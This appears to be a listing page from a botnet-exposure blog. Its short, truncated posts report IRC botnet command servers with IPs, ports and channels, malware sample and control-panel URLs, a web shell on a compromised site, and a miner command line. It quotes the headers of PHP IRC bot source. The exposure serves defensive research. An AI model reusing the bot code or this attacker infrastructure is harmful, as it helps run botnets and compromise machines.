Author: Pig

Resolved : [o.ksah4ck.com] To [70.88.160.105] Resolved : [o.ksah4ck.com] To [66.41.211.152] Remote Host Port Number 66.41.211.152 3921 NICK [0]USA|XP-SP2[P]552515 USER [0]USA|XP-SP2[P]552515 “localhost” “o.ksah4ck.com” :Notepad. JOIN #errorz hosting infos: http://whois.domaintools.com/70.88.160.105

Albanian hecker using php bots to flood irc channels ##################################################################### #v1.0 Ultimate phpB. Enjoy ! ! ! ! ! # # # # # # # # Fixed By TiRoNcI_BoY® # # Albhack@msn.com # ##################################################################### <? set_time_limit(0); error_reporting(0); class pBot { ####################### V1.0 CONFIGURATION ######################## var $config = array("server"=>"189.30.30.10", # "port"=>6667, //port do server #Read more...

I found this link http://focori.com.br/images/x.php it was a php shell uploaded to vulnerable site inside i found the bot used for exploiting vulnerable sites <? /* * * NOGROD. since 2008 * IRC.UDPLINK.NET * * COMMANDS: * * .user <password> //login to the bot * .logout //logout of the bot * .die //kill the botRead more...

Our anonymous friend pointed this url http://cbteam.ws/(inside u have samples) i checked files and i found this botnet wich i allready posted ip’s in the blog Resolved : [cube.sdeirc.net] To [89.248.166.139] Remote Host Port Number cube.sdeirc.net 7392 PASS none NICK New{US-XP-x86}1124207 USER 1124207 “” “1124207” :1124207 MODE New{US-XP-x86}1124207 +iMmx JOIN #a secret JOIN #rndbot zragRead more...

Got the sample from our anonymous friend and here is what it does 1.downloads file installer.gif GET /installer.gif?action=started&browser=ie6&ver=1_16_149_149&bic=66583225931340E1B463893B68AD2174IE&app=4761&appver=0&verifier=eb9f1208f7e0fabe1db48c4f79a1fbad&srcid=0&subid=0&zdata=0&ff=1&ch=1&default=X&os=XP&admin=1&type=14337 HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: stats.crossrider.com Connection: Keep-Alive Cache-Control: no-cache 2.downloads and install fake chrome The data identified by the following URLs was then requested from the remote web server: http://o-o.preferred.xo-ord1.v9.lscache2.c.pack.google.com/edgedl/chrome/install/1123.1/chrome_installer.exe?cms_redirect=yes http://crt.usertrust.com/AddTrustExternalCARoot.p7c http://app-static.crossrider.com/plugin/apps/4761/plugins/1_16_149_149/ie6/plugins.json?ver=2 http://app-static.crossrider.com/plugin/opensearch/ie/4761.xml http://cotssl.crossrider.com/plugin/apps/4761/manifest/1_16_149_149/ie6/manifest.xml?ver=0 http://crl.verisign.com/pca3.crl http://crl.verisign.com/ThawteTimestampingCA.crlRead more...

Botnet found by our anonymous friend this one is mysticals botnet again Server vps.modtech360.info:6664 channel #Boss sample hosting infos: http://whois.domaintools.com/128.204.202.126

Samples are provided from this anonymous guy in this post http://www.exposedbotnets.com/2012/04/img196-imageshackushttp-malware-hosted.html Resolved : [queerbag.com] To [188.165.212.101] Control panel here http://queerbag.com/jow1z/ u ned user:pass to login 2 exe samples are in this directory http://queerbag.com/bot/ ourbot.exe conects to port 8000 tcp UPDATE: There is another domain name user from this file Resolved : [ugnazi.com] To [176.31.237.84] hereRead more...

This is one of samples uploaded by our anonymous friend in this post http://www.exposedbotnets.com/2012/04/img196-imageshackushttp-malware-hosted.html Resolved : [aaa1adasadasda444.net] To [217.11.251.173] The control panel is here aaa1adasadasda444.net/admin/image.php credits goes to anonymous guy for proving samples hosting infos: http://whois.domaintools.com/217.11.251.173

This is the second belgian hoster found hosting malwares that’s not good lol Again another great contribution from our anonymous friend wich i called malware because it uses infected machines to do what he does the bitcoin miner is downloaded from here gwassnet.co.cc/NoTouch.exe it connects to svchost2.exe -o http://eu.triplemining.com:8344 -u trap258_gwas -p himom 111 0Read more...